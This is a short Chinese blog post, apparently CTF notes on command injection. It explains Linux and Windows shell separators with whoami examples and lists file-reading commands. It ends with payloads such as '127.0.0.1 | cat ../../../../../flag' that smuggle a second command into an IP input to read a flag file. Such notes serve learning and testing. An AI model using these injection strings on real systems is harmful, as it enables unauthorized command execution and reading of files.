本文介绍了Linux和Windows中的管道符命令用法,包括基本命令如more,less,head,cat,tac,tail等,以及它们在文件操作中的组合。同时提到了利用管道符进行文件路径遍历的payload示例,暗示了潜在的安全威胁。
exec命令执行
先补充一下,有关于管道符的相关知识
管道符
命令为假可以理解成命令不存在或者命令结果为假
Linux
;前面和后面命令都要执行,无论前面真假 #ls ; whoami
|直接执行后面的语句 #ls |whoami
|| 如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 #ls || whoami
&前面和后面命令都要执行,先执行前面的语句,无论前面真假 #ls & whoami
&& 如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令(顺序执行) #ls && whoami
windows
|直接执行后面的语句 #dir |whoami
|| 如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 #dir || whoami
&前面和后面命令都要执行(顺序执行),无论前面真假 #dir & whoami
&& 如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 #dir && whoami
linux读取文件的一些命令
more: 一页一页的显示档案内容
less: 与more 类似 ,其优点可以往前翻页,而且进行可以搜索字符
head: 查看头几行
cat: 由第一行开始显示内容,并将所有内容输出
tac: 从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail: 查看尾几行
tailf: 类似于 tail -f
nl :类似于 cat -n, 显示的时候,顺便输出行号
od: 以二进制的方式读取档案内容 ,搭配 -c 参数读内容
vi: 一种编辑器,这个也可以查看
vim: 一种编辑器,这个也可以查看
sort: 可以查看
uniq: 可以查看
window 下的转义字符为 "^",linux 下的转义字符为 "\"
尝试使用管道符进行拼接
payload
127.0.0.1 | cat ../../../../../flag
127.0.0.1 | tac ../../../../../flag
127.0.0.1 ; cat ../../../../../flag
127.0.0.1 && cat ../../../../../flag
127.0.0. & cat ../../../../../flag
以上payload都可以出flag
446
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
